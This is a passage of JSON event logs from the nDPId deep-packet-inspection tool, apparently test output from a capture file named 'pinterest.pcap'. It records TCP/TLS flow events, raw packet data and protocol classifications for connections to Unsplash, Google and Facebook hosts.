{"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,resources.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}} +00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715133,"flow_last_seen":1605289715133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715133,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605289715133,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715133,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfcAAAAAoAL9IJHxAAACBAWgBAIICjiITggAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605289715210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715210,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJfoEpGV7hz5n4oBJXgLSTAAACBAV4AQMDAwQCCArCuSXYOIhOCA=="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2781,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605289715210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715210,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfiBKRlfgBAB+zhYAAABAQgKOIhOVcK5Jdg="} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715221,"flow_last_seen":1605289715221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605289715221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715221,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0CzwAAAAAoAL9ILgWAAACBAWgBAIICnB0noAAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3385,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605289715273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715273,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUkNYqBSe29As9oBJXgJmfAAACBAV4AQMDAwQCCArCuSYncHSegA=="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3387,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605289715273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715273,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0Cz3WKgUogBAB+x19AAABAQgKcHSetMK5Jic="} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715274,"flow_last_seen":1605289715274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605289715274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715274,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIYAAAAAoAL9IIqeAAACBAWgBAIICrhM3AoAAAAAAQMDBw=="} +00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605289715301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715301,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDwMAAT+s6wDAAAAAMqAcsBIEmLB5kd7IUo3\/YpAbvIXBJtCi5yubyHoBJXgCqsAAACBAV4AQMDAwQCCArCuSZZuEzcCg=="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3662,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605289715301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715301,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIcSbQovgBAB+66iAAABAQgKuEzcJcK5Jlk="} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715782,"flow_last_seen":1605289715782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605289715782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715782,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWoAAAAAoAL9IBbyAAACBAWgBAIICmcfa8wAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6878,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605289715833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715833,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDxHwCD+s6wDAAAJd4qAcsBIEmLB5kd7IUo3\/YpAbvrtAAp+EJkW7VroBJXgNkoAAACBAV4AQMDAwQCCArCuShfZx9rzA=="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6886,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605289715833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715833,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWsAKfhDgBAB+10HAAABAQgKZx9r\/8K5KF8="} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715966,"flow_last_seen":1605289715966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605289715966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715966,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B4AAAAAoAL9IFQFAAACBAWgBAIICqkvSd0AAAAAAQMDBw=="} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8901,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605289716021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289716021,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6rg79HT9v4ewfoBJXgOHBAAACBAV4AQMDAwQCCArCuSkJqS9J3Q=="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8902,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605289716021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716021,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B8O\/R1AgBAB+2WcAAABAQgKqS9KFMK5KQk="} +00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 